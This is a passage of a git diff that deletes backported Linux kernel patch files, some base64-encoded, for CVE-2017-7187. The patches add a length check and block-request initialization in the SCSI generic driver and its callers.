iAJc3RydWN0IGtyZWYgZl9yZWY7CkBAIC01NjYsNyArNTcwLDcgQEAKIAlTZ19yZXF1ZXN0ICpzcnA7CiAJc3RydWN0IHNnX2hlYWRlciBvbGRfaGRyOwogCXNnX2lvX2hkcl90ICpocDsKLQl1bnNpZ25lZCBjaGFyIGNtbmRbTUFYX0NPTU1BTkRfU0laRV07CisJdW5zaWduZWQgY2hhciBjbW5kW1NHX01BWF9DREJfU0laRV07CiAKIAlpZiAodW5saWtlbHkoc2VnbWVudF9lcShnZXRfZnMoKSwgS0VSTkVMX0RTKSkpCiAJCXJldHVybiAtRUlOVkFMOwpAQCAtNjAxLDEyICs2MDUsNiBAQAogCWJ1ZiArPSBTWl9TR19IRUFERVI7CiAJX19nZXRfdXNlcihvcGNvZGUsIGJ1Zik7CiAJaWYgKHNmcC0+bmV4dF9jbWRfbGVuID4gMCkgewotCQlpZiAoc2ZwLT5uZXh0X2NtZF9sZW4gPiBNQVhfQ09NTUFORF9TSVpFKSB7Ci0JCQlTQ1NJX0xPR19USU1FT1VUKDEsIHByaW50aygic2dfd3JpdGU6IGNvbW1hbmQgbGVuZ3RoIHRvbyBsb25nXG4iKSk7Ci0JCQlzZnAtPm5leHRfY21kX2xlbiA9IDA7Ci0JCQlzZ19yZW1vdmVfcmVxdWVzdChzZnAsIHNycCk7Ci0JCQlyZXR1cm4gLUVJTzsKLQkJfQogCQljbWRfc2l6ZSA9IHNmcC0+bmV4dF9jbWRfbGVuOwogCQlzZnAtPm5leHRfY21kX2xlbiA9IDA7CS8qIHJlc2V0IHNvIG9ubHkgdGhpcyB3cml0ZSgpIGVmZmVjdGVkICovCiAJfSBlbHNlIHsKQEAgLTY3OCw3ICs2NzYsNyBAQAogCWludCBrOwogCVNnX3JlcXVlc3QgKnNycDsKIAlzZ19pb19oZHJfdCAqaHA7Ci0JdW5zaWduZWQgY2hhciBjbW5kW01BWF9DT01NQU5EX1NJWkVdOworCXVuc2lnbmVkIGNoYXIgY21uZFtTR19NQVhfQ0RCX1NJWkVdOwogCWludCB0aW1lb3V0OwogCXVuc2lnbmVkIGxvbmcgdWxfdGltZW91dDsKIApAQCAtMTY0OCwxNSArMTY0NiwyNyBAQAogCXN0cnVjdCByZXF1ZXN0X3F1ZXVlICpxID0gc2ZwLT5wYXJlbnRkcC0+ZGV2aWNlLT5yZXF1ZXN0X3F1ZXVlOwogCXN0cnVjdCBycV9tYXBfZGF0YSAqbWQsIG1hcF9kYXRhOwogCWludCBydyA9IGhwLT5keGZlcl9kaXJlY3Rpb24gPT0gU0dfRFhGRVJfVE9fREVWID8gV1JJVEUgOiBSRUFEOworCXVuc2lnbmVkIGNoYXIgKmxvbmdfY21kcCA9IE5VTEw7CiAKIAlTQ1NJX0xPR19USU1FT1VUKDQsIHByaW50ayhLRVJOX0lORk8gInNnX3N0YXJ0X3JlcTogZHhmZXJfbGVuPSVkXG4iLAogCQkJCSAgIGR4ZmVyX2xlbikpOwogCisJaWYgKGhwLT5jbWRfbGVuID4gQkxLX01BWF9DREIpIHsKKwkJbG9uZ19jbWRwID0ga3phbGxvYyhocC0+Y21kX2xlbiwgR0ZQX0tFUk5FTCk7CisJCWlmICghbG9uZ19jbWRwKQorCQkJcmV0dXJuIC1FTk9NRU07CisJfQorCiAJcnEgPSBibGtfZ2V0X3JlcXVlc3QocSwgcncsIEdGUF9BVE9NSUMpOwotCWlmICghcnEpCisJaWYgKCFycSkgeworCQlrZnJlZShsb25nX2NtZHApOwogCQlyZXR1cm4gLUVOT01FTTsKKwl9CiAKIAlibGtfcnFfc2V0X2Jsb2NrX3BjKHJxKTsKKworCWlmIChocC0+Y21kX2xlbiA+IEJMS19NQVhfQ0RCKQorCQlycS0+Y21kID0gbG9uZ19jbWRwOwogCW1lbWNweShycS0+Y21kLCBjbWQsIGhwLT5jbWRfbGVuKTsKIAlycS0+Y21kX2xlbiA9IGhwLT5jbWRfbGVuOwogCkBAIC0xNzQxLDYgKzE3NTEsOCBAQAogCQlpZiAoc3JwLT5iaW8pCiAJCQlyZXQgPSBibGtfcnFfdW5tYXBfdXNlcihzcnAtPmJpbyk7CiAKKwkJaWYgKHNycC0+cnEtPmNtZCAhPSBzcnAtPnJxLT5fX2NtZCkKKwkJCWtmcmVlKHNycC0+cnEtPmNtZCk7CiAJCWJsa19wdXRfcmVxdWVzdChzcnAtPnJxKTsKIAl9CiAKZGlmZiAtLWdpdCBhL2luY2x1ZGUvdWFwaS9zY3NpL3NnLmggYi9pbmNsdWRlL3VhcGkvc2NzaS9zZy5oCmluZGV4IGE5ZjNjNmYuLmQ4YzBjNDMgMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvdWFwaS9zY3NpL3NnLmgKKysrIGIvaW5jbHVkZS91YXBpL3Njc2kvc2cuaApAQCAtNCw3NyArNCwzNCBAQAogI2luY2x1ZGUgPGxpbnV4L2NvbXBpbGVyLmg+CiAKIC8qCi0gICBIaXN0b3J5OgotICAgIFN0YXJ0ZWQ6IEF1ZyA5IGJ5IExhd3JlbmNlIEZvYXJkIChlbnRyb3B5QHdvcmxkLnN0ZC5jb20pLCB0byBhbGxvdyB1c2VyCi0gICAgIHByb2Nlc3MgY29udHJvbCBvZiBTQ1NJIGRldmljZXMuCi0gICAgRGV2ZWxvcG1lbnQgU3BvbnNvcmVkIGJ5IEtpbGx5IENvcnAuIE5ZIE5ZCi1PcmlnaW5hbCBkcml2ZXIgKHNnLmgpOgotKiAgICAgICBDb3B5cmlnaHQgKEMpIDE5OTIgTGF3cmVuY2UgRm9hcmQKLVZlcnNpb24gMiBhbmQgMyBleHRlbnNpb25zIHRvIGRyaXZlcjoKLSogICAgICAgQ29weXJpZ2h0IChDKSAxOTk4IC0gMjAwNiBEb3VnbGFzIEdpbGJlcnQKLQotICAgIFZlcnNpb246IDMuNS4zNCAoMjAwNjA5MjApCi0gICAgVGhpcyB2ZXJzaW9uIGlzIGZvciAyLjYgc2VyaWVzIGtlcm5lbHMuCi0KLSAgICBGb3IgYSBmdWxsIGNoYW5nZWxvZyBzZWUgaHR0cDovL3d3dy50b3JxdWUubmV0L3NnCi0KLU1hcCBvZiBTRyB2ZXJpb25zIHRvIHRoZSBMaW51eCBrZXJuZWxzIGluIHdoaWNoIHRoZXkgYXBwZWFyOgotICAgICAgIC0tLS0tLS0tLS0gICAgICAgIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLSAgICAgICBvcmlnaW5hbCAgICAgICAgICBhbGwga2VybmVscyA8IDIuMi42Ci0gICAgICAgMi4xLjQwICAgICAgICAgICAgMi4yLjIwCi0gICAgICAgMy4wLnggICAgICAgICAgICAgb3B0aW9uYWwgdmVyc2lvbiAzIHNnIGRyaXZlciBmb3IgMi4yIHNlcmllcwotICAgICAgIDMuMS4xNysrICAgICAgICAgIDIuNC4wKysKLSAgICAgICAzLjUuMzArKyAgICAgICAgICAyLjYuMCsrCi0KLU1ham9yIG5ldyBmZWF0dXJlcyBpbiBTRyAzLnggZHJpdmVyIChjZiBTRyAyLnggZHJpdmVycykKLQktIFNHX0lPIGlvY3RsKCkgY29tYmluZXMgZnVuY3Rpb24gaWYgd3JpdGUoKSBhbmQgcmVhZCgpCi0JLSBuZXcgaW50ZXJmYWNlIChzZ19pb19oZHJfdCkgYnV0IHN0aWxsIHN1cHBvcnRzIG9sZCBpbnRlcmZhY2UKLQktIHNjYXR0ZXIvZ2F0aGVyIGluIHVzZXIgc3BhY2UsIGRpcmVjdCBJTywgYW5kIG1tYXAgc3VwcG9ydGVkCi0KLSBUaGUgbm9ybWFsIGFjdGlvbiBvZiB0aGlzIGRyaXZlciBpcyB0byB1c2UgdGhlIGFkYXB0ZXIgKEhCQSkgZHJpdmVyIHRvIERNQQotIGRhdGEgaW50byBrZXJuZWwgYnVmZmVycyBhbmQgdGhlbiB1c2UgdGhlIENQVSB0byBjb3B5IHRoZSBkYXRhIGludG8gdGhlIAotIHVzZXIgc3BhY2UgKHZpY2UgdmVyc2EgZm9yIHdyaXRlcykuIFRoYXQgaXMgY2FsbGVkICJpbmRpcmVjdCIgSU8gZHVlIHRvIAotIHRoZSBkb3VibGUgaGFuZGxpbmcgb2YgZGF0YS4gVGhlcmUgYXJlIHR3byBtZXRob2RzIG9mZmVyZWQgdG8gcmVtb3ZlIHRoZQotIHJlZHVuZGFudCBjb3B5OiAxKSBkaXJlY3QgSU8gYW5kIDIpIHVzaW5nIHRoZSBtbWFwKCkgc3lzdGVtIGNhbGwgdG8gbWFwCi0gdGhlIHJlc2VydmUgYnVmZmVyICh0aGlzIGRyaXZlciBoYXMgb25lIHJlc2VydmUgYnVmZmVyIHBlciBmZCkgaW50byB0aGUKLSB1c2VyIHNwYWNlLiBCb3RoIGhhdmUgdGhlaXIgYWR2YW50YWdlcy4KLSBJbiB0ZXJtcyBvZiBhYnNvbHV0ZSBzcGVlZCBtbWFwKCkgaXMgZmFzdGVyLiBJZiBzcGVlZCBpcyBub3QgYSBjb25jZXJuLCAKLSBpbmRpcmVjdCBJTyBzaG91bGQgYmUgZmluZS4gUmVhZCB0aGUgZG9jdW1lbnRhdGlvbiBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KLQotICoqIE4uQi4gVG8gdXNlIGRpcmVjdCBJTyAnZWNobyAxID4gL3Byb2Mvc2NzaS9zZy9hbGxvd19kaW8nIG9yCi0gICAgICAgICAnZWNobyAxID4gL3N5cy9tb2R1bGUvc2cvcGFyYW1ldGVycy9hbGxvd19kaW8nIGlzIG5lZWRlZC4KLSAgICAgICAgIFRoYXQgYXR0cmlidXRlIGlzIDAgYnkgZGVmYXVsdC4gKioKLSAKLSBIaXN0b3JpY2FsIG5vdGU6IHRoaXMgU0NTSSBwYXNzLXRocm91Z2ggZHJpdmVyIGhhcyBiZWVuIGtub3duIGFzICJzZyIgZm9yIAotIGEgZGVjYWRlLiBJbiBicm9hZGVyIGtlcm5lbCBkaXNjdXNzaW9ucyAic2ciIGlzIHVzZWQgdG8gcmVmZXIgdG8gc2NhdHRlcgotIGdhdGhlciB0ZWNobmlxdWVzLiBUaGUgY29udGV4dCBzaG91bGQgY2xhcmlmeSB3aGljaCAic2ciIGlzIHJlZmVycmVkIHRvLgotCi0gRG9jdW1lbnRhdGlvbgotID09PT09PT09PT09PT0KLSBBIHdlYiBzaXRlIGZvciB0aGUgU0cgZGV2aWNlIGRyaXZlciBjYW4gYmUgZm91bmQgYXQ6Ci0JaHR0cDovL3d3dy50b3JxdWUubmV0L3NnICBbYWx0ZXJuYXRpdmVseSBjaGVjayB0aGUgTUFJTlRBSU5FUlMgZmlsZV0KLSBUaGUgZG9jdW1lbnRhdGlvbiBmb3IgdGhlIHNnIHZlcnNpb24gMyBkcml2ZXIgY2FuIGJlIGZvdW5kIGF0OgotIAlodHRwOi8vd3d3LnRvcnF1ZS5uZXQvc2cvcC9zZ192M19oby5odG1sCi0gVGhpcyBpcyBhIHJlbmRlcmluZyBmcm9tIERvY0Jvb2sgc291cmNlIFtjaGFuZ2UgdGhlIGV4dGVuc2lvbiB0byAic2dtbCIKLSBvciAieG1sIl0uIFRoZXJlIGFyZSByZW5kZXJpbmdzIGluICJwcyIsICJwZGYiLCAicnRmIiBhbmQgInR4dCIgKHNvb24pLgotIFRoZSBTR19JTyBpb2N0bCBpcyBub3cgZm91bmQgaW4gb3RoZXIgcGFydHMga2VybmVsIChlLmcuIHRoZSBibG9jayBsYXllcikuCi0gRm9yIG1vcmUgaW5mb3JtYXRpb24gc2VlIGh0dHA6Ly93d3cudG9ycXVlLm5ldC9zZy9zZ19pby5odG1sCi0KLSBUaGUgb2xkZXIsIHZlcnNpb24gMiBkb2N1bWVudHMgZGlzY3VzcyB0aGUgb3JpZ2luYWwgc2cgaW50ZXJmYWNlIGluIGRldGFpbDoKLQlodHRwOi8vd3d3LnRvcnF1ZS5uZXQvc2cvcC9zY3NpLWdlbmVyaWMudHh0Ci0JaHR0cDovL3d3dy50b3JxdWUubmV0L3NnL3Avc2NzaS1nZW5lcmljX2xvbmcudHh0Ci0gQWxzbyBhdmFpbGFibGU6IDxrZXJuZWxfc291cmNlPi9Eb2N1bWVudGF0aW9uL3Njc2kvc2NzaS1nZW5lcmljLnR4dAotCi0gVXRpbGl0eSBhbmQgdGVzdCBwcm9ncmFtcyBhcmUgYXZhaWxhYmxlIGF0IHRoZSBzZyB3ZWIgc2l0ZS4gVGhleSBhcmUgCi0gcGFja2FnZWQgYXMgc2czX3V0aWxzIChmb3IgdGhlIGxrIDIuNCBhbmQgMi42IHNlcmllcykgYW5kIHNnX3V0aWxzCi0gKGZvciB0aGUgbGsgMi4yIHNlcmllcykuCi0qLworICogSGlzdG9yeToKKyAqICBTdGFydGVkOiBBdWcgOSBieSBMYXdyZW5jZSBGb2FyZCAoZW50cm9weUB3b3JsZC5zdGQuY29tKSwgdG8gYWxsb3cgdXNlcgorICogICBwcm9jZXNzIGNvbnRyb2wgb2YgU0NTSSBkZXZpY2VzLgorICogIERldmVsb3BtZW50IFNwb25zb3JlZCBieSBLaWxseSBDb3JwLiBOWSBOWQorICoKKyAqIE9yaWdpbmFsIGRyaXZlciAoc2cuaCk6CisgKiAgICAgICBDb3B5cmlnaHQgKEMpIDE5OTIgTGF3cmVuY2UgRm9hcmQKKyAqIFZlcnNpb24gMiBhbmQgMyBleHRlbnNpb25zIHRvIGRyaXZlcjoKKyAqCUNvcHlyaWdodCAoQykgMTk5OCAtIDIwMTQgRG91Z2xhcyBHaWxiZXJ0CisgKgorICogIFZlcnNpb246IDMuNS4zNiAoMjAxNDA2MDMpCisgKiAgVGhpcyB2ZXJzaW9uIGlzIGZvciAyLjYgYW5kIDMgc2VyaWVzIGtlcm5lbHMuCisgKgorICogRG9jdW1lbnRhdGlvbgorICogPT09PT09PT09PT09PQorICogQSB3ZWIgc2l0ZSBmb3IgdGhlIFNHIGRldmljZSBkcml2ZXIgY2FuIGJlIGZvdW5kIGF0OgorICoJaHR0cDovL3NnLmRhbm55LmN6L3NnICBbYWx0ZXJuYXRpdmVseSBjaGVjayB0aGUgTUFJTlRBSU5FUlMgZmlsZV0KKyAqIFRoZSBkb2N1bWVudGF0aW9uIGZvciB0aGUgc2cgdmVyc2lvbiAzIGRyaXZlciBjYW4gYmUgZm91bmQgYXQ6CisgKglodHRwOi8vc2cuZGFubnkuY3ovc2cvcC9zZ192M19oby5odG1sCisgKiBBbHNvIHNlZTogPGtlcm5lbF9zb3VyY2U+L0RvY3VtZW50YXRpb24vc2NzaS9zY3NpLWdlbmVyaWMudHh0CisgKgorICogRm9yIHV0aWxpdHkgYW5kIHRlc3QgcHJvZ3JhbXMgc2VlOiBodHRwOi8vc2cuZGFubnkuY3ovc2cvc2czX3V0aWxzLmh0bWwKKyAqLwogCiAjaWZkZWYgX19LRVJORUxfXwogZXh0ZXJuIGludCBzZ19iaWdfYnVmZjsgLyogZm9yIHN5c2N0bCAqLwogI2VuZGlmCiAKLS8qIE5ldyBpbnRlcmZhY2UgaW50cm9kdWNlZCBpbiB0aGUgMy54IFNHIGRyaXZlcnMgZm9sbG93cyAqLwogCiB0eXBlZGVmIHN0cnVjdCBzZ19pb3ZlYyAvKiBzYW1lIHN0cnVjdHVyZSBhcyB1c2VkIGJ5IHJlYWR2KCkgTGludXggc3lzdGVtICovCiB7ICAgICAgICAgICAgICAgICAgICAgICAvKiBjYWxsLiBJdCBkZWZpbmVzIG9uZSBzY2F0dGVyLWdhdGhlciBlbGVtZW50LiAqLwpAQCAtODcsNyArNDQsNyBAQAogewogICAgIGludCBpbnRlcmZhY2VfaWQ7ICAgICAgICAgICAvKiBbaV0gJ1MnIGZvciBTQ1NJIGdlbmVyaWMgKHJlcXVpcmVkKSAqLwogICAgIGludCBkeGZlcl9kaXJlY3Rpb247ICAgICAgICAvKiBbaV0gZGF0YSB0cmFuc2ZlciBkaXJlY3Rpb24gICovCi0gICAgdW5zaWduZWQgY2hhciBjbWRfbGVuOyAgICAgIC8qIFtpXSBTQ1NJIGNvbW1hbmQgbGVuZ3RoICggPD0gMTYgYnl0ZXMpICovCisgICAgdW5zaWduZWQgY2hhciBjbWRfbGVuOyAgICAgIC8qIFtpXSBTQ1NJIGNvbW1hbmQgbGVuZ3RoICovCiAgICAgdW5zaWduZWQgY2hhciBteF9zYl9sZW47ICAgIC8qIFtpXSBtYXggbGVuZ3RoIHRvIHdyaXRlIHRvIHNicCAqLwogICAgIHVuc2lnbmVkIHNob3J0IGlvdmVjX2NvdW50OyAvKiBbaV0gMCBpbXBsaWVzIG5vIHNjYXR0ZXIgZ2F0aGVyICovCiAgICAgdW5zaWduZWQgaW50IGR4ZmVyX2xlbjsgICAgIC8qIFtpXSBieXRlIGNvdW50IG9mIGRhdGEgdHJhbnNmZXIgKi8K
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0006.patch b/Patches/Linux_CVEs/CVE-2017-7187/3.10/0006.patch
deleted file mode 100644
index 218df720..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0006.patch
+++ /dev/null
@@ -1,29 +0,0 @@
-From 0bf5dc993cf6be1b1dd716fb05c1fa84623093e5 Mon Sep 17 00:00:00 2001
-From: peter chang <dpf@google.com>
-Date: Wed, 15 Feb 2017 14:11:54 -0800
-Subject: [PATCH] scsi: sg: check length passed to SG_NEXT_CMD_LEN
-
-The user can control the size of the next command passed along, but the
-value passed to the ioctl isn't checked against the usable max command
-size.
-
-Change-Id: I9e8eb8ca058c0103a22f5d99d77919432893aa4c
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Peter Chang <dpf@google.com>
-Acked-by: Douglas Gilbert <dgilbert@interlog.com>
-Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
----
-
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index 96d635e..4a6b13b 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -978,6 +978,8 @@
- 		result = get_user(val, ip);
- 		if (result)
- 			return result;
-+		if (val > SG_MAX_CDB_SIZE)
-+			return -ENOMEM;
- 		sfp->next_cmd_len = (val > 0) ? val : 0;
- 		return 0;
- 	case SG_GET_VERSION_NUM:
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0006.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7187/3.10/0006.patch.base64
deleted file mode 100644
index dfa5014d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0006.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSAwYmY1ZGM5OTNjZjZiZTFiMWRkNzE2ZmIwNWMxZmE4NDYyMzA5M2U1IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBwZXRlciBjaGFuZyA8ZHBmQGdvb2dsZS5jb20+CkRhdGU6IFdlZCwgMTUgRmViIDIwMTcgMTQ6MTE6NTQgLTA4MDAKU3ViamVjdDogW1BBVENIXSBzY3NpOiBzZzogY2hlY2sgbGVuZ3RoIHBhc3NlZCB0byBTR19ORVhUX0NNRF9MRU4KClRoZSB1c2VyIGNhbiBjb250cm9sIHRoZSBzaXplIG9mIHRoZSBuZXh0IGNvbW1hbmQgcGFzc2VkIGFsb25nLCBidXQgdGhlCnZhbHVlIHBhc3NlZCB0byB0aGUgaW9jdGwgaXNuJ3QgY2hlY2tlZCBhZ2FpbnN0IHRoZSB1c2FibGUgbWF4IGNvbW1hbmQKc2l6ZS4KCkNoYW5nZS1JZDogSTllOGViOGNhMDU4YzAxMDNhMjJmNWQ5OWQ3NzkxOTQzMjg5M2FhNGMKQ2M6IDxzdGFibGVAdmdlci5rZXJuZWwub3JnPgpTaWduZWQtb2ZmLWJ5OiBQZXRlciBDaGFuZyA8ZHBmQGdvb2dsZS5jb20+CkFja2VkLWJ5OiBEb3VnbGFzIEdpbGJlcnQgPGRnaWxiZXJ0QGludGVybG9nLmNvbT4KU2lnbmVkLW9mZi1ieTogTWFydGluIEsuIFBldGVyc2VuIDxtYXJ0aW4ucGV0ZXJzZW5Ab3JhY2xlLmNvbT4KLS0tCgpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL3NnLmMgYi9kcml2ZXJzL3Njc2kvc2cuYwppbmRleCA5NmQ2MzVlLi40YTZiMTNiIDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvc2cuYworKysgYi9kcml2ZXJzL3Njc2kvc2cuYwpAQCAtOTc4LDYgKzk3OCw4IEBACiAJCXJlc3VsdCA9IGdldF91c2VyKHZhbCwgaXApOwogCQlpZiAocmVzdWx0KQogCQkJcmV0dXJuIHJlc3VsdDsKKwkJaWYgKHZhbCA+IFNHX01BWF9DREJfU0laRSkKKwkJCXJldHVybiAtRU5PTUVNOwogCQlzZnAtPm5leHRfY21kX2xlbiA9ICh2YWwgPiAwKSA/IHZhbCA6IDA7CiAJCXJldHVybiAwOwogCWNhc2UgU0dfR0VUX1ZFUlNJT05fTlVNOgo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-7187/3.4/0001.patch
deleted file mode 100644
index a6938be5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0001.patch
+++ /dev/null
@@ -1,383 +0,0 @@
-From 1f0843591703c3d664a236e2d3a7a855fa9451d6 Mon Sep 17 00:00:00 2001
-From: Jens Axboe <axboe@fb.com>
-Date: Fri, 06 Jun 2014 07:57:37 -0600
-Subject: [PATCH] BACKPORT: block: add blk_rq_set_block_pc()
-
-With the optimizations around not clearing the full request at alloc
-time, we are leaving some of the needed init for REQ_TYPE_BLOCK_PC
-up to the user allocating the request.
-
-Add a blk_rq_set_block_pc() that sets the command type to
-REQ_TYPE_BLOCK_PC, and properly initializes the members associated
-with this type of request. Update callers to use this function instead
-of manipulating rq->cmd_type directly.
-
-Includes fixes from Christoph Hellwig <hch@lst.de> for my half-assed
-attempt.
-
-Change-Id: Ifc386dfb951c5d6adebf48ff38135dda28e4b1ce
-Signed-off-by: Jens Axboe <axboe@fb.com>
----
-
-diff --git a/block/blk-core.c b/block/blk-core.c
-index eb0ec60..c7f7637 100644
---- a/block/blk-core.c
-+++ b/block/blk-core.c
-@@ -1043,6 +1043,8 @@
- 	if (unlikely(!rq))
- 		return ERR_PTR(-ENOMEM);
- 
-+	blk_rq_set_block_pc(rq);
-+
- 	for_each_bio(bio) {
- 		struct bio *bounce_bio = bio;
- 		int ret;
-@@ -1060,6 +1062,22 @@
- EXPORT_SYMBOL(blk_make_request);
- 
- /**
-+ * blk_rq_set_block_pc - initialize a requeest to type BLOCK_PC
-+ * @rq:		request to be initialized
-+ *
-+ */
-+void blk_rq_set_block_pc(struct request *rq)
-+{
-+	rq->cmd_type = REQ_TYPE_BLOCK_PC;
-+	rq->__data_len = 0;
-+	rq->__sector = (sector_t) -1;
-+	rq->bio = rq->biotail = NULL;
-+	memset(rq->__cmd, 0, sizeof(rq->__cmd));
-+	rq->cmd = rq->__cmd;
-+}
-+EXPORT_SYMBOL(blk_rq_set_block_pc);
-+
-+/**
-  * blk_requeue_request - put a request back on queue
-  * @q:		request queue where request should be inserted
-  * @rq:		request to be inserted
-diff --git a/block/bsg.c b/block/bsg.c
-index b1c1d54..8c750d5 100644
---- a/block/bsg.c
-+++ b/block/bsg.c
-@@ -196,7 +196,6 @@
- 	 * fill in request structure
- 	 */
- 	rq->cmd_len = hdr->request_len;
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 
- 	rq->timeout = msecs_to_jiffies(hdr->timeout);
- 	if (!rq->timeout)
-@@ -273,6 +272,8 @@
- 	rq = blk_get_request(q, rw, GFP_KERNEL);
- 	if (!rq)
- 		return ERR_PTR(-ENOMEM);
-+	blk_rq_set_block_pc(rq);
-+
- 	ret = blk_fill_sgv4_hdr_rq(q, rq, hdr, bd, has_write_perm);
- 	if (ret)
- 		goto out;
-diff --git a/block/scsi_ioctl.c b/block/scsi_ioctl.c
-index 260fa80..4118a81 100644
---- a/block/scsi_ioctl.c
-+++ b/block/scsi_ioctl.c
-@@ -232,7 +232,6 @@
- 	 * fill in request structure
- 	 */
- 	rq->cmd_len = hdr->cmd_len;
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 
- 	rq->timeout = msecs_to_jiffies(hdr->timeout);
- 	if (!rq->timeout)
-@@ -313,6 +312,7 @@
- 	rq = blk_get_request(q, writing ? WRITE : READ, GFP_KERNEL);
- 	if (!rq)
- 		return -ENOMEM;
-+	blk_rq_set_block_pc(rq);
- 
- 	if (blk_fill_sghdr_rq(q, rq, hdr, mode)) {
- 		blk_put_request(rq);
-@@ -511,7 +511,7 @@
- 	memset(sense, 0, sizeof(sense));
- 	rq->sense = sense;
- 	rq->sense_len = 0;
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
-+	blk_rq_set_block_pc(rq);
- 
- 	blk_execute_rq(q, disk, rq, 0);
- 
-@@ -544,7 +544,7 @@
- 	int err;
- 
- 	rq = blk_get_request(q, WRITE, __GFP_WAIT);
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
-+	blk_rq_set_block_pc(rq);
- 	rq->timeout = BLK_DEFAULT_SG_TIMEOUT;
- 	rq->cmd[0] = cmd;
- 	rq->cmd[4] = data;
-diff --git a/drivers/block/pktcdvd.c b/drivers/block/pktcdvd.c
-index ba66e44..39ffe9c 100644
---- a/drivers/block/pktcdvd.c
-+++ b/drivers/block/pktcdvd.c
-@@ -742,6 +742,7 @@
- 
- 	rq = blk_get_request(q, (cgc->data_direction == CGC_DATA_WRITE) ?
- 			     WRITE : READ, __GFP_WAIT);
-+	blk_rq_set_block_pc(rq);
- 
- 	if (cgc->buflen) {
- 		if (blk_rq_map_kern(q, rq, cgc->buffer, cgc->buflen, __GFP_WAIT))
-@@ -752,7 +753,6 @@
- 	memcpy(rq->cmd, cgc->cmd, CDROM_PACKET_SIZE);
- 
- 	rq->timeout = 60*HZ;
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 	if (cgc->quiet)
- 		rq->cmd_flags |= REQ_QUIET;
- 
-diff --git a/drivers/cdrom/cdrom.c b/drivers/cdrom/cdrom.c
-index d620b44..7ab528d 100644
---- a/drivers/cdrom/cdrom.c
-+++ b/drivers/cdrom/cdrom.c
-@@ -2165,6 +2165,7 @@
- 			ret = -ENOMEM;
- 			break;
- 		}
-+		blk_rq_set_block_pc(rq);
- 
- 		ret = blk_rq_map_user(q, rq, NULL, ubuf, len, GFP_KERNEL);
- 		if (ret) {
-@@ -2184,7 +2185,6 @@
- 		rq->cmd[9] = 0xf8;
- 
- 		rq->cmd_len = 12;
--		rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 		rq->timeout = 60 * HZ;
- 		bio = rq->bio;
- 
-diff --git a/drivers/scsi/device_handler/scsi_dh_alua.c b/drivers/scsi/device_handler/scsi_dh_alua.c
-index 04c5cea..36fb68c 100644
---- a/drivers/scsi/device_handler/scsi_dh_alua.c
-+++ b/drivers/scsi/device_handler/scsi_dh_alua.c
-@@ -111,6 +111,7 @@
- 			    "%s: blk_get_request failed\n", __func__);
- 		return NULL;
- 	}
-+	blk_rq_set_block_pc(rq);
- 
- 	if (buflen && blk_rq_map_kern(q, rq, buffer, buflen, GFP_NOIO)) {
- 		blk_put_request(rq);
-@@ -119,7 +120,6 @@
- 		return NULL;
- 	}
- 
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 	rq->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- 			 REQ_FAILFAST_DRIVER;
- 	rq->retries = ALUA_FAILOVER_RETRIES;
-diff --git a/drivers/scsi/device_handler/scsi_dh_emc.c b/drivers/scsi/device_handler/scsi_dh_emc.c
-index e1c8be0..6f07f7f 100644
---- a/drivers/scsi/device_handler/scsi_dh_emc.c
-+++ b/drivers/scsi/device_handler/scsi_dh_emc.c
-@@ -280,6 +280,7 @@
- 		return NULL;
- 	}
- 
-+	blk_rq_set_block_pc(rq);
- 	rq->cmd_len = COMMAND_SIZE(cmd);
- 	rq->cmd[0] = cmd;
- 
-@@ -304,7 +305,6 @@
- 		break;
- 	}
- 
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 	rq->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- 			 REQ_FAILFAST_DRIVER;
- 	rq->timeout = CLARIION_TIMEOUT;
-diff --git a/drivers/scsi/device_handler/scsi_dh_hp_sw.c b/drivers/scsi/device_handler/scsi_dh_hp_sw.c
-index 084062b..e9d9fea 100644
---- a/drivers/scsi/device_handler/scsi_dh_hp_sw.c
-+++ b/drivers/scsi/device_handler/scsi_dh_hp_sw.c
-@@ -120,7 +120,7 @@
- 	if (!req)
- 		return SCSI_DH_RES_TEMP_UNAVAIL;
- 
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
-+	blk_rq_set_block_pc(req);
- 	req->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- 			  REQ_FAILFAST_DRIVER;
- 	req->cmd_len = COMMAND_SIZE(TEST_UNIT_READY);
-@@ -250,7 +250,7 @@
- 	if (!req)
- 		return SCSI_DH_RES_TEMP_UNAVAIL;
- 
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
-+	blk_rq_set_block_pc(req);
- 	req->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- 			  REQ_FAILFAST_DRIVER;
- 	req->cmd_len = COMMAND_SIZE(START_STOP);
-diff --git a/drivers/scsi/device_handler/scsi_dh_rdac.c b/drivers/scsi/device_handler/scsi_dh_rdac.c
